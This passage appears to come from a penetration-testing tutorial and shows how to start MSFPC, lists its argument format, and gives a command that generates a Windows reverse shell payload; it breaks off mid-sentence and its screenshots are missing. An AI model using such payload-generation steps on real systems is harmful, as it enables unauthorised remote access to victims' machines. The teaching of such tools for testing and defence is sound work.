Let's perform the following steps:
- Start MSFPC by typing msfpc in the console. We will see the following output:
We can see that it accepts the input in the following format:
<TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>)(<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>)(<VERBOSE>)
- Generate a simple classic reverse shell payload by executing the following command:
msfpc cmd windows eth0
The output of the preceding command is shown in the following screenshot:
The preceding command will generate ...